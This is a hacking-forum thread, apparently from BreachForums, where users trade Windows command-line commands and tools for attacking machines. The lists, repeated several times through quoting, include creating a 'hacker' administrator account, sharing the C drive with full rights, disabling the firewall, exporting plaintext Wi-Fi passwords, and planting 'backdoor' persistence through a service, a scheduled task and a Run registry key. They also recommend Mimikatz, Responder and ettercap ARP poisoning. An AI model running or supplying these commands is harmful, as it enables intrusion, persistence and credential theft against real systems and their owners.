[edward]

Instead of booting up kali or some other linux distro, what can we run straight from the Windows command prompt?

This forum account is currently banned. Ban Length: Permanent (N/A Remaining)
Ban Reason: Leeching | Contact us via https://breachforums.ai/contact if you feel this is incorrect.

[H4rDw4Y]

Bunch of usefull command :
    net user hacker hacker /add - Creates a new local user named ‘hacker’ with the password ‘hacker’.
    net localgroup administrators hacker /add - Adds the new user ‘hacker’ to the local administrators group.
    net share nothing$=C:\ /grant:hacker,FULL /unlimited - Shares the C drive as a Windows share and grants the user ‘hacker’ full rights to access or modify anything on that drive.
    netsh advfirewall set currentprofile state off - Disables the current profile's firewall.
    netsh interface portproxy add v4tov4 listenport=3000 listenaddress=1.1.1.1 connectport=4000 connectaddress=2.2.2.2 - Sets up a port forwarding rule.
    psexec /accepteula \\targetIP -u domain\user -p password -c -f \\smbIP\share\file.exe - Executes a file hosted on a remote system with specified credentials.
    tasklist /S ip /v - Lists detailed information about the processes running on a remote system.
    systeminfo /S ip /U domain\user /P password - Displays detailed configuration information about a computer and its operating system, including operating system configuration, security information, product ID, and hardware properties.
    net use z: \\ip\share password /user:DOMAIN\user - Maps a network drive to the specified share using the provided credentials.
    shutdown /m \\ip /r /t 0 /f - Forces a remote machine to restart immediately.
    rundll32.exe user32.dll,LockWorkStation - Locks the workstation.
    netsh advfirewall set allprofiles state off - Disables the firewall for all profiles.
Bunch of usefull windows app:
    PingCastle: A tool designed for assessing the security of Active Directory infrastructures.
    BloodHound: Utilizes graph theory to reveal the hidden and often unintended relationships within an Active Directory environment.
    Mimikatz: A tool to extract plaintexts passwords, hash, PIN code, and kerberos tickets from memory. Mimikatz can also perform pass-the-hash, pass-the-ticket or build Golden tickets.
    PowerShell Empire: A post-exploitation framework that allows the use of PowerShell to perform various tasks on Windows systems, similar to what Metasploit offers for network systems.
    Nmap with Npcap: While Nmap is not Windows-specific, Npcap allows it to run on Windows. Nmap is used for network discovery and security auditing.
    Wireshark with WinPcap: Wireshark is a network protocol analyzer, and WinPcap is the Windows version of the pcap library, which allows Wireshark to interface with network devices in Windows.
    Sysinternals Suite: A suite of technical tools to help you manage, troubleshoot, and diagnose your Windows systems and applications.
    Process Hacker: A tool that can be used for monitoring system resources, debugging software, and detecting malware.
    Metasploit Framework (Windows Version): While also not exclusive to Windows, the Metasploit Framework has a Windows installer, and it's a powerful tool for developing and executing exploit code against a remote target machine.
    Responder: A LLMNR, NBT-NS, and MDNS poisoner, designed to perform man-in-the-middle attacks on network environments.
    Burp Suite: Primarily used for web application security testing, it has a Windows version and is extensively used for intercepting and modifying network traffic.

[Croquet]

Bunch of usefull command :
    net user hacker hacker /add - Creates a new local user named ‘hacker’ with the password ‘hacker’.
    net localgroup administrators hacker /add - Adds the new user ‘hacker’ to the local administrators group.
    net share nothing$=C:\ /grant:hacker,FULL /unlimited - Shares the C drive as a Windows share and grants the user ‘hacker’ full rights to access or modify anything on that drive.
    netsh advfirewall set currentprofile state off - Disables the current profile's firewall.
    netsh interface portproxy add v4tov4 listenport=3000 listenaddress=1.1.1.1 connectport=4000 connectaddress=2.2.2.2 - Sets up a port forwarding rule.
    psexec /accepteula \\targetIP -u domain\user -p password -c -f \\smbIP\share\file.exe - Executes a file hosted on a remote system with specified credentials.
    tasklist /S ip /v - Lists detailed information about the processes running on a remote system.
    systeminfo /S ip /U domain\user /P password - Displays detailed configuration information about a computer and its operating system, including operating system configuration, security information, product ID, and hardware properties.
    net use z: \\ip\share password /userOMAIN\user - Maps a network drive to the specified share using the provided credentials.
    shutdown /m \\ip /r /t 0 /f - Forces a remote machine to restart immediately.
    rundll32.exe user32.dll,LockWorkStation - Locks the workstation.
    netsh advfirewall set allprofiles state off - Disables the firewall for all profiles.

Thank you, I didn't know some of these commands

[H4rDw4Y]

It's from RTFM ( Red Team Field Manual) but I extracted all usefull and interresting command :

More :
    net user /delete hacker - Deletes the user ‘hacker’ from the system.
    icacls C:\ /grant hacker:(OI)(CI)F /T - Grants the user ‘hacker’ full permissions to all files and directories on the C drive.
    netsh wlan show profiles - Lists all the wireless network profiles stored on the computer.
    netsh wlan export profile key=clear - Exports the network profiles and their plaintext keys (passwords) to XML files.
    wmic product get name,version - Lists installed software and their versions on the computer.
    wmic qfe get - Displays the installed Windows updates (quick fixes and security updates).
    sc create backdoor binpath= "cmd /K start" start= auto - Creates a new service named ‘backdoor’ that opens a command prompt upon system start.
    sc delete backdoor - Deletes the previously created ‘backdoor’ service.
    netstat -ano - Lists all ports and connections with their process IDs, allowing you to see which processes are listening on which ports.
    taskkill /F /PID pid_number - Forcibly terminates a process with the specified PID.
    schtasks /create /tn "Backdoor" /tr "cmd.exe /c start cmd.exe" /sc onstart - Creates a scheduled task named "Backdoor" that opens a command prompt every time the computer starts.
    reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v Backdoor /t REG_SZ /d "cmd.exe /c start" /f - Adds a registry key to start a command prompt window each time the current user logs in.
    net session \\ip /delete - Ends a session between the local computer and the remote computer at the specified IP address.

[NetworkingWink]

It's from RTFM ( Red Team Field Manual) but I extracted all usefull and interresting command :

More :
    net user /delete hacker - Deletes the user ‘hacker’ from the system.
    icacls C:\ /grant hackerOI)(CI)F /T - Grants the user ‘hacker’ full permissions to all files and directories on the C drive.
    netsh wlan show profiles - Lists all the wireless network profiles stored on the computer.
    netsh wlan export profile key=clear - Exports the network profiles and their plaintext keys (passwords) to XML files.
    wmic product get name,version - Lists installed software and their versions on the computer.
    wmic qfe get - Displays the installed Windows updates (quick fixes and security updates).
    sc create backdoor binpath= "cmd /K start" start= auto - Creates a new service named ‘backdoor’ that opens a command prompt upon system start.
    sc delete backdoor - Deletes the previously created ‘backdoor’ service.
    netstat -ano - Lists all ports and connections with their process IDs, allowing you to see which processes are listening on which ports.
    taskkill /F /PID pid_number - Forcibly terminates a process with the specified PID.
    schtasks /create /tn "Backdoor" /tr "cmd.exe /c start cmd.exe" /sc onstart - Creates a scheduled task named "Backdoor" that opens a command prompt every time the computer starts.
    reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v Backdoor /t REG_SZ /d "cmd.exe /c start" /f - Adds a registry key to start a command prompt window each time the current user logs in.
    net session \\ip /delete - Ends a session between the local computer and the remote computer at the specified IP address.

Do you know any tutorial to learn mitm using fiddler or a similar program ? Thank you

[alph4byt33]

hashcat, allows you to take full advantage of that gaming gpu

[H4rDw4Y]

It's from RTFM ( Red Team Field Manual) but I extracted all usefull and interresting command :

More :
    net user /delete hacker - Deletes the user ‘hacker’ from the system.
    icacls C:\ /grant hackerOI)(CI)F /T - Grants the user ‘hacker’ full permissions to all files and directories on the C drive.
    netsh wlan show profiles - Lists all the wireless network profiles stored on the computer.
    netsh wlan export profile key=clear - Exports the network profiles and their plaintext keys (passwords) to XML files.
    wmic product get name,version - Lists installed software and their versions on the computer.
    wmic qfe get - Displays the installed Windows updates (quick fixes and security updates).
    sc create backdoor binpath= "cmd /K start" start= auto - Creates a new service named ‘backdoor’ that opens a command prompt upon system start.
    sc delete backdoor - Deletes the previously created ‘backdoor’ service.
    netstat -ano - Lists all ports and connections with their process IDs, allowing you to see which processes are listening on which ports.
    taskkill /F /PID pid_number - Forcibly terminates a process with the specified PID.
    schtasks /create /tn "Backdoor" /tr "cmd.exe /c start cmd.exe" /sc onstart - Creates a scheduled task named "Backdoor" that opens a command prompt every time the computer starts.
    reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v Backdoor /t REG_SZ /d "cmd.exe /c start" /f - Adds a registry key to start a command prompt window each time the current user logs in.
    net session \\ip /delete - Ends a session between the local computer and the remote computer at the specified IP address.

Do you know any tutorial to learn mitm using fiddler or a similar program ? Thank you

The best well known is ettercap with arp poisoning attack  :
https://blog.hackerassociate.com/how-to-...-ettercap/

But it depend on what you want to do

[dense]

wow! thanks for sharing these.

This forum account is currently banned. Ban Length: Permanent (N/A Remaining)
Ban Reason: Leeching | http://c66go4clkqodr7tdjfu76jztjs7w7d3fajdeypxn73v4ju3dt7g5yyyd.onion/Forum-Ban-Appeals if you feel this is incorrect.

[NetworkingWink]

It's from RTFM ( Red Team Field Manual) but I extracted all usefull and interresting command :

More :
    net user /delete hacker - Deletes the user ‘hacker’ from the system.
    icacls C:\ /grant hackerOI)(CI)F /T - Grants the user ‘hacker’ full permissions to all files and directories on the C drive.
    netsh wlan show profiles - Lists all the wireless network profiles stored on the computer.
    netsh wlan export profile key=clear - Exports the network profiles and their plaintext keys (passwords) to XML files.
    wmic product get name,version - Lists installed software and their versions on the computer.
    wmic qfe get - Displays the installed Windows updates (quick fixes and security updates).
    sc create backdoor binpath= "cmd /K start" start= auto - Creates a new service named ‘backdoor’ that opens a command prompt upon system start.
    sc delete backdoor - Deletes the previously created ‘backdoor’ service.
    netstat -ano - Lists all ports and connections with their process IDs, allowing you to see which processes are listening on which ports.
    taskkill /F /PID pid_number - Forcibly terminates a process with the specified PID.
    schtasks /create /tn "Backdoor" /tr "cmd.exe /c start cmd.exe" /sc onstart - Creates a scheduled task named "Backdoor" that opens a command prompt every time the computer starts.
    reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v Backdoor /t REG_SZ /d "cmd.exe /c start" /f - Adds a registry key to start a command prompt window each time the current user logs in.
    net session \\ip /delete - Ends a session between the local computer and the remote computer at the specified IP address.

Do you know any tutorial to learn mitm using fiddler or a similar program ? Thank you

The best well known is ettercap with arp poisoning attack  :
https://blog.hackerassociate.com/how-to-...-ettercap/

But it depend on what you want to do

I will look in to this .... Well Im trying to find bugs via http attacks like request body response body . Attacks in json java or what ever is there , most of the time is json . I want to learn how to perform this attack try to modify key values headers what block me for modify this keys . Long time ago when I worked in security was simple just modify a key with fiddler classic and then you know there is a bug . Now you have to do different stuff when you attack a post or a get . For me is like I'm in a different world right now .
Thank you for your response I really appreciate.